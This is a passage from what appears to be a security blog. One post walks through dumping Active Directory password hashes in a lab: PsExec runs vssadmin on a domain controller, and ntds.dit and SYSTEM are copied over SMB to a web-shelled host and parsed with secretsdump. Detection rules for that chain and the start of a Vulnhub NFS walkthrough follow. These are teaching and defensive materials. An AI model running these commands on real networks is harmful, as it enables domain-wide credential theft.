If we manage to run the "vssadmin" command on the Windows AD Domain Controller machine, it will generate a volume shadow copy of the "C" drive, and from that shadow copy we can copy the "ntds.dit" and "SYSTEM" files of the AD Domain Controller machine.<br />
To achieve this, we will be using "psexec.exe", which is capable of executing commands on remote Windows machines if we specify the target machine IP, the domain admin username and its password, together with the "elevated" option (-h).<br />
We need to upload psexec.exe to the Windows machine "LABONE" using the web shell. From the web shell, we will specify the AD Domain Controller machine IP, the Domain Admin username and its password along with the "vssadmin" command.<br />
The psexec binary will execute the vssadmin command on the Windows AD Domain Controller machine remotely. After creating the "C" drive shadow copy, we need to copy the "ntds.dit" and "SYSTEM" files from that shadow copy to the machine where we have web shell access, i.e. the Windows domain machine "LABONE". This is also done with the "psexec" binary: we specify the target AD Domain Controller machine IP, the Domain Admin username and its password along with a "copy" command which tells the DC to copy the ntds.dit and SYSTEM files from the shadow copy to the LABONE machine over SMB. I will be copying the files into the same directory where I have dumped the psexec binary on the "LABONE" machine.<br />
<br />
The general command for using the "psexec" binary to execute a command on a remote host is<br />
<textarea cols="120" rows="1">psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute"
</textarea>
<br />
In my case, the information was as follows:<br />
remote_IP: 192.168.56.200 (queen.DC1.indishell.lab)<br />
user_name: user1<br />
password_of_the_user: ica_1046<br />
<br />
I have a web shell on the Windows domain machine "LABONE" and have uploaded the psexec binary to the server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIctcZTPbcHrKRiHrp50PtTYMWpt_FZjVMNOqqhDTCxf-eDhuugidN6-TTlNyR6OUhLyWRXiLi6AMobXXiGLIbc0osK0NG8CNgraJmY42A0xGMHiSZvbrtsaZG-DZet1YCnX_HKYaR48g/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="859" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIctcZTPbcHrKRiHrp50PtTYMWpt_FZjVMNOqqhDTCxf-eDhuugidN6-TTlNyR6OUhLyWRXiLi6AMobXXiGLIbc0osK0NG8CNgraJmY42A0xGMHiSZvbrtsaZG-DZet1YCnX_HKYaR48g/s1600/1.png" /></a></div>
<br />
First, I am checking whether any shadow copy of the "C" drive is available or not. To list the available volume shadow copies, the command is:<br />
<textarea cols="70" rows="1">vssadmin list shadows</textarea>
<br />
Here, the web shell is not capable of showing all the output of a command executed by the psexec binary on the remote host, so I am redirecting the output of the command to the machine "LABONE" (where I have web shell access). I will be directing the output of the command into the directory "C:\xampp\htdocs\box\ps\".<br />
The command to perform this task is:<br />
<textarea cols="120" rows="2">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin list shadows > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt" </textarea>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRssnU3kn0x-NXVXDp-JeiVDTfS9G4hMYXVRh0ZWux6JWTPHq6OiplM9nDrCr0mUKc1x30yCqxsyivK1uCQS759FHFrb3AO7mvpKAe8b4l1AIOACN25H_RYcWocokMTPzCVIUPMvxDWlU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1491" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRssnU3kn0x-NXVXDp-JeiVDTfS9G4hMYXVRh0ZWux6JWTPHq6OiplM9nDrCr0mUKc1x30yCqxsyivK1uCQS759FHFrb3AO7mvpKAe8b4l1AIOACN25H_RYcWocokMTPzCVIUPMvxDWlU/s1600/2.png" /></a></div>
<br />
The web shell shows that psexec is executing the command on the remote Windows AD Domain Controller machine. If everything goes fine, we will get a file named "out.txt" in the directory "C:\xampp\htdocs\box\ps", and it will contain the output of the "vssadmin list shadows" command which was executed on the AD Domain Controller machine (192.168.56.200).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVeN4f6Jz0A0FwGvPjt-jQyNB21o4DxT2Ra4OBKwHJ64ZJRXcV9JtwLFdL_eBOiatxIAx_RT7OgNGolvv1wMSYSzBTAgFFkI7Irmr3GrzhzomF8iJcsQxP1qr0HQCyFYS_DZutVL97mI/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="615" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVeN4f6Jz0A0FwGvPjt-jQyNB21o4DxT2Ra4OBKwHJ64ZJRXcV9JtwLFdL_eBOiatxIAx_RT7OgNGolvv1wMSYSzBTAgFFkI7Irmr3GrzhzomF8iJcsQxP1qr0HQCyFYS_DZutVL97mI/s1600/3.png" /></a></div>
<br />
Yes, we have the file in the directory. Let's check the content of the file "out.txt".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gJnIgZRXVdMH1fn4EBVXBqyhUER8mY7i-4X-jfgn3BFGQR58b3hlWImVljfG9W6tVSVpY1um1WhkmwyALe0DsYAC7nD6eJqOCYhSHyewhS7av7BZ2D12gLI3dJHMtKgRXTxNl9SOKnA/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="836" data-original-width="1275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gJnIgZRXVdMH1fn4EBVXBqyhUER8mY7i-4X-jfgn3BFGQR58b3hlWImVljfG9W6tVSVpY1um1WhkmwyALe0DsYAC7nD6eJqOCYhSHyewhS7av7BZ2D12gLI3dJHMtKgRXTxNl9SOKnA/s1600/4.png" /></a></div>
<br />
The "out.txt" file content shows that the target Domain Controller machine does not have any volume shadow copy yet.<br />
<br />
Let's create one shadow copy of the "C" drive so that we can steal the "ntds.dit" and "SYSTEM" files from it.<br />
The command to create a volume shadow copy of the C drive is<br />
<textarea cols="120" rows="1">vssadmin create shadow /for=C: </textarea>
<br />
<br />
One important thing to keep in mind is that we need the name of the newly created volume shadow copy of the "C" drive, and it will be in the output of the command, so we will be redirecting the output of the above command to the machine on which we have web shell access.<br />
To copy the "ntds.dit" and "SYSTEM" files from the target machine, we need to have the name of the shadow copy.<br />
The final command will be:<br />
<textarea cols="120" rows="1">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"</textarea>
<br />
<br />
In the above command, the psexec binary executes a command on the Windows AD Domain Controller machine (192.168.56.200) to create a shadow copy of the "C" drive and then redirects the output of that command to the machine "LABONE" in the file "C:\xampp\htdocs\box\ps\out.txt".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLCmUOAlw3Yen072P6O_rLyJMqj9ohvyGVS1Vh5sNugb2eQ1xiil3kOEG6yAB5hooaSRWple5I8EZWYs6aNztePrBkEmfFHarwS7JQaaykNDcs-M4YNVSI2jDmT2bmBEgIIOyVlDo_rXQ/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="617" data-original-width="1562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLCmUOAlw3Yen072P6O_rLyJMqj9ohvyGVS1Vh5sNugb2eQ1xiil3kOEG6yAB5hooaSRWple5I8EZWYs6aNztePrBkEmfFHarwS7JQaaykNDcs-M4YNVSI2jDmT2bmBEgIIOyVlDo_rXQ/s1600/5.png" /></a></div>
<br />
The content of the "out.txt" file will tell us the location of the shadow copy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxhTY4hWMaZeVxGaD9kY8tXjXDeYGsfa-S33uNb2kFynAOeQGk_BEoLW-6iV1ahK1oeBt50wcz6c5Ym6oNQCja7oH5F0Qw52i6Vac7S4LLxScwcmpxWPHQ_6vlNFQnefFnbPRNLIHC8Y/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="854" data-original-width="1339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxhTY4hWMaZeVxGaD9kY8tXjXDeYGsfa-S33uNb2kFynAOeQGk_BEoLW-6iV1ahK1oeBt50wcz6c5Ym6oNQCja7oH5F0Qw52i6Vac7S4LLxScwcmpxWPHQ_6vlNFQnefFnbPRNLIHC8Y/s1600/6.png" /></a></div>
<br />
In the above screenshot, we can see that the shadow copy volume name is "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\".<br />
<br />
The locations of the "ntds.dit" and "SYSTEM" files will be the following:<br />
<br />
"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"<br />
<br />
"shadow_copy_volume_name\Windows\System32\config\SYSTEM"<br />
<br />
In my case they will be:<br />
<br />
"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"<br />
<br />
"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"<br />
<br />
Let's copy the "ntds.dit" file from the target Windows AD Domain Controller machine using the command below:<br />
<textarea cols="120" rows="2">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit \\192.168.56.101\C$\xampp\htdocs\box\ps\"</textarea>
<br />
<br />
This command will copy the "ntds.dit" file from the remote machine with IP "192.168.56.200" to the machine "LABONE" with IP "192.168.56.101", into the directory "C:\xampp\htdocs\box\ps\".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDGaqQAAyJdskaOKYXVu0iP7le48_oxOdtPNcHi8v9ZdLywEazKgXEWQ0_IOlKvl_lOo7HnUrhJf2guyxz4UWYHmdtTk5IdFzsTUQxgtq70PqYeWfI2V4XTorD0IyTRNttB5wV2s4UNw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="1595" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDGaqQAAyJdskaOKYXVu0iP7le48_oxOdtPNcHi8v9ZdLywEazKgXEWQ0_IOlKvl_lOo7HnUrhJf2guyxz4UWYHmdtTk5IdFzsTUQxgtq70PqYeWfI2V4XTorD0IyTRNttB5wV2s4UNw/s1600/7.png" /></a></div>
<br />
And yes, the web shell shows that 1 file has been copied from the target DC machine to my machine. Let's confirm by checking whether the directory "C:\xampp\htdocs\box\ps" has the "ntds.dit" file or not.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5fwx6BmAvQYXYc7R9Gv_gdsmhcrh3msfgJvQQdRW8vYMugkVVmTtWL8GQTvJlC587JYOMOjPiDTNo8fcfJbSMbbVwpXnS03qTSr3PzLhz0ZeBFfKbI_LSvccvzpsLXr8c5bEROHc7544/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="716" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5fwx6BmAvQYXYc7R9Gv_gdsmhcrh3msfgJvQQdRW8vYMugkVVmTtWL8GQTvJlC587JYOMOjPiDTNo8fcfJbSMbbVwpXnS03qTSr3PzLhz0ZeBFfKbI_LSvccvzpsLXr8c5bEROHc7544/s1600/8.png" /></a></div>
<br />
Yes, it has been copied to the "LABONE" machine on which I have web shell access.<br />
<br />
And finally, copy the "SYSTEM" file as well using the command below:<br />
<textarea cols="120" rows="2">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM \\192.168.56.101\C$\xampp\htdocs\box\ps\"</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpF_qrqORQgfXXoa0srC92bSN5DN14rFR7OwuCyuQ9mGrolO6yQfa8WuHlLyEC57S-9W6sKmrAnPsFCKmn3PFLWuBad9My5_Tds2W2C9wn39tiBsjKWy69qUurqpu02Zv0l1jHcIx4Dk/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="723" data-original-width="1590" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpF_qrqORQgfXXoa0srC92bSN5DN14rFR7OwuCyuQ9mGrolO6yQfa8WuHlLyEC57S-9W6sKmrAnPsFCKmn3PFLWuBad9My5_Tds2W2C9wn39tiBsjKWy69qUurqpu02Zv0l1jHcIx4Dk/s1600/9.png" /></a></div>
<br />
The command executed successfully and the web shell shows the "1 file copied" message. Let's check for the "SYSTEM" file as well.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsLzrnwgALFi9xng08NNr9VGIYA6czChg2yJfAQaafwUMbwzgrglioFzqn3EDBhmHEuEwBVSktVwdFpAZEJJSDLVwFs15Jn8K49gc56NYKxuxj43pngmlGRQAMlU4A-SV7Tzh8RoA-4M/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsLzrnwgALFi9xng08NNr9VGIYA6czChg2yJfAQaafwUMbwzgrglioFzqn3EDBhmHEuEwBVSktVwdFpAZEJJSDLVwFs15Jn8K49gc56NYKxuxj43pngmlGRQAMlU4A-SV7Tzh8RoA-4M/s1600/10.png" /></a></div>
<br />
And that's all. We finally got both files on the "LABONE" machine, from where we can download them using the web shell.<br />
<br />
Now, we can extract the domain, user ID, RID, LM and NT hashes from the "ntds.dit" and "SYSTEM" files using the <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py" target="_blank">secretsdump.py</a> python script<br />
<br />
The command to dump the user IDs and the LM and NT hashes is:<br />
<textarea cols="120" rows="1"> python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL</textarea>
<br />
<br />
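From the defender's side, the three remotely driven steps just walked through (PsExec installing its service on the DC, vssadmin creating the shadow copy, and ntds.dit/SYSTEM being copied out of the \\?\GLOBALROOT\... device to an administrative share) each leave a distinct Windows event. The following is an added example, not code from this post or from Sysinternals: a small rule set run over constructed event records shaped like event ID 7045 (System log, service installed) and event ID 4688 (Security log, process creation). The rule names, the hostnames and the address 10.0.0.101 are made up; note that 4688 only carries a CommandLine field when the "Include command line in process creation events" audit policy is enabled.<br />

```python
"""Detection rules for the remote shadow-copy credential dump described above.

Added example, not code from the blog or from PsExec/Sysinternals. The event
records are constructed: they keep the field names of Windows event ID 7045
(System log, service installed) and 4688 (Security log, process creation) but
are plain dicts, as a log collector might hand them to a rule engine.
"""
import ntpath
import re

PSEXEC_SERVICE = re.compile(r"psexesvc", re.I)
SHADOW_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\b.*\bcreate\s+shadow\b", re.I)
SHADOW_DEVICE = re.compile(r"HarddiskVolumeShadowCopy\d+", re.I)
CRED_STORE = re.compile(r"ntds\.dit|system32\\config\\system\b", re.I)
# \\host\C$ style administrative share used as a redirect or copy target.
ADMIN_SHARE = re.compile(r"\\\\[^\\\s]+\\[A-Za-z]\$", re.I)

SAMPLE_EVENTS = [  # constructed; hostnames and 10.0.0.101 are made up
    {"log": "System", "event_id": 7045, "host": "dc01",
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"log": "Security", "event_id": 4688, "host": "dc01", "SubjectUserName": "user1",
     "ParentProcessName": "C:\\Windows\\PSEXESVC.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'cmd /c "vssadmin create shadow /for=C: > \\\\10.0.0.101\\C$\\xampp\\htdocs\\box\\ps\\out.txt"'},
    {"log": "Security", "event_id": 4688, "host": "dc01", "SubjectUserName": "user1",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin create shadow /for=C:"},
    {"log": "Security", "event_id": 4688, "host": "dc01", "SubjectUserName": "user1",
     "ParentProcessName": "C:\\Windows\\PSEXESVC.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'cmd /c "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy5\\Windows\\NTDS\\NTDS.dit \\\\10.0.0.101\\C$\\xampp\\htdocs\\box\\ps\\"'},
    # Routine backup-agent activity on a workstation: must not alert.
    {"log": "Security", "event_id": 4688, "host": "ws07", "SubjectUserName": "svc_backup",
     "ParentProcessName": "C:\\Program Files\\Backup\\agent.exe",
     "NewProcessName": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
]


def _basename(path):
    return ntpath.basename(path or "").lower()


def detect(events):
    """Return (rule, host, event_id, detail) tuples, in event order."""
    alerts = []
    for ev in events:
        host, eid = ev.get("host", "?"), ev.get("event_id")
        cmd = ev.get("CommandLine", "")
        if ev.get("log") == "System" and eid == 7045:
            if PSEXEC_SERVICE.search(ev.get("ServiceName", "") + " " + ev.get("ImagePath", "")):
                alerts.append(("psexec_service_installed", host, eid, ev.get("ImagePath", "")))
        elif ev.get("log") == "Security" and eid == 4688:
            if SHADOW_CREATE.search(cmd):
                alerts.append(("shadow_copy_created", host, eid, cmd))
            if SHADOW_DEVICE.search(cmd) and CRED_STORE.search(cmd):
                alerts.append(("ntds_or_system_read_from_shadow_copy", host, eid, cmd))
            if _basename(ev.get("ParentProcessName")) == "psexesvc.exe" and ADMIN_SHARE.search(cmd):
                alerts.append(("psexec_child_wrote_to_remote_admin_share", host, eid, cmd))
    return alerts


def correlate(alerts):
    """Group distinct rule names per host; several on one host is the chain above."""
    by_host = {}
    for rule, host, _eid, _detail in alerts:
        by_host.setdefault(host, set()).add(rule)
    return {host: sorted(rules) for host, rules in by_host.items()}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print(correlate(found))
```

A single "vssadmin create shadow" on a domain controller is noisy on its own (backup software does it), which is why the rules are correlated per host: a PSEXESVC service install followed by shadow creation and a copy that names both a HarddiskVolumeShadowCopy device and ntds.dit is the sequence this post performs, and on a DC it should page someone. Restricting the hosts from which Domain Admin credentials may be used, and alerting on any new service installation on a DC, cut the chain off at its first step.<br />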
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwiP7FKcgJlBNB4x9b1iEO-Hq8SHHHN5JtyUnl1y4HgiSyKBndPBPkk5f4zZGeAEUNjsnP6JSkwF7BFGKuZb1TqLX9PvYGv93XAfPZqqudCuUA0c-UyaXqdaeC3bOX9Tt4WF1UUbZ8SI/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="185" data-original-width="1127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwiP7FKcgJlBNB4x9b1iEO-Hq8SHHHN5JtyUnl1y4HgiSyKBndPBPkk5f4zZGeAEUNjsnP6JSkwF7BFGKuZb1TqLX9PvYGv93XAfPZqqudCuUA0c-UyaXqdaeC3bOX9Tt4WF1UUbZ8SI/s1600/11.png" /></a></div>
<br />
The result will be something like this<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTTFLFNdnmH39XdX1Z-b8usIpUCKblCEkkErIb15EdY8QckweEW0gxBgxPey9Xl4VIUrDHKGfyYAonTB-KfrWSl91JDrV3X8ua8VP8r6t52huZOkceoQt8H56Op6wCHvU3HFXoMD2uLEw/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="844" data-original-width="1436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTTFLFNdnmH39XdX1Z-b8usIpUCKblCEkkErIb15EdY8QckweEW0gxBgxPey9Xl4VIUrDHKGfyYAonTB-KfrWSl91JDrV3X8ua8VP8r6t52huZOkceoQt8H56Op6wCHvU3HFXoMD2uLEw/s1600/12.png" /></a></div>
<br />
Thanks for reading.<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>, <a href="https://twitter.com/Pwsecspirit" target="_blank">Spirited wolf</a>
<br />
<br />
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<br />
<br />
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-37055064317292788502018-07-15T20:15:00.000+05:302019-05-18T21:24:01.633+05:30Vulnhub Linux VM "Lin.Security 1" Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Hello All,<br />
<br />
This blog post is a walkthrough of the vulnerable Linux VM "Lin.Security 1".<br />
Download link: <a href="https://www.vulnhub.com/entry/linsecurity-1,244/" target="_blank">https://www.vulnhub.com/entry/linsecurity-1,244/</a><br />
<br />
After configuring the VM, I started with a port scan using Nmap.<br />
The result was the following:<br />
<textarea cols="80" rows="32">PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|_ 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 38865/tcp mountd
| 100005 1,2,3 51496/udp mountd
| 100021 1,3,4 43485/tcp nlockmgr
| 100021 1,3,4 55660/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 38865/tcp mountd
| 100005 1,2,3 51496/udp mountd
| 100021 1,3,4 43485/tcp nlockmgr
| 100021 1,3,4 55660/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
</textarea>
<br />
<br />
Port 2049 is open, which is the NFS service (rpcbind on 111 and the mountd and nlockmgr ports in the rpcinfo output belong to it as well).<br />
<br />
To list the directories the machine exports, run the command below; it queries mountd and prints each export together with the clients allowed to mount it:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">showmount -e Machine_IP</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC9vlTgwtuLYrdGgZSxMKKnkmFETZxkRZYoBj_SpKc42KiYnrUKWnE6GeOfrBk_58Lwj0eXrEaqPcBV3IINLwfPrq-PLaa7L5uRa-yAWDzqkhJBzYoqGIEbLwe-do7C07UuXE4SaW2mOo/s1600/mount+show.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="124" data-original-width="508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC9vlTgwtuLYrdGgZSxMKKnkmFETZxkRZYoBj_SpKc42KiYnrUKWnE6GeOfrBk_58Lwj0eXrEaqPcBV3IINLwfPrq-PLaa7L5uRa-yAWDzqkhJBzYoqGIEbLwe-do7C07UuXE4SaW2mOo/s1600/mount+show.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The share "/home/peter" is exported to every client ("*"), so anyone on the network can mount it.</div>
<div class="separator" style="clear: both; text-align: left;">
Let's mount it on the attacker machine with the command below. The "nolock" option is passed through "-o"; it skips the NLM lock manager, which is fine when all we want is to read and write files.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
mount -t nfs -o nolock Machine_IP:share_name local_machine_directory</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I mounted the share on a local directory named "b0x".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLczXydazYHtJjYxOYVMWn4VOdWRvqaUc-9JF9gG7_RDVgvY0vlMkNWnc9i15Dh04hBCQ4D9Aowv4v8WPnqe30iWe3jSEi5IPnzNpf6SIbXpMil2TOKtNQcs-3LDfANwBBUpXQwm7edM/s1600/mounted.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLczXydazYHtJjYxOYVMWn4VOdWRvqaUc-9JF9gG7_RDVgvY0vlMkNWnc9i15Dh04hBCQ4D9Aowv4v8WPnqe30iWe3jSEi5IPnzNpf6SIbXpMil2TOKtNQcs-3LDfANwBBUpXQwm7edM/s1600/mounted.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
"ls -al" shows the contents of peter's home directory ("/home/peter").<br />
<br />
Next I checked the ownership of the mounted share with the command below. The UID and GID it reports are the numeric ids stored on the server, and those numbers are what NFS will compare our requests against:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">stat b0x </span>
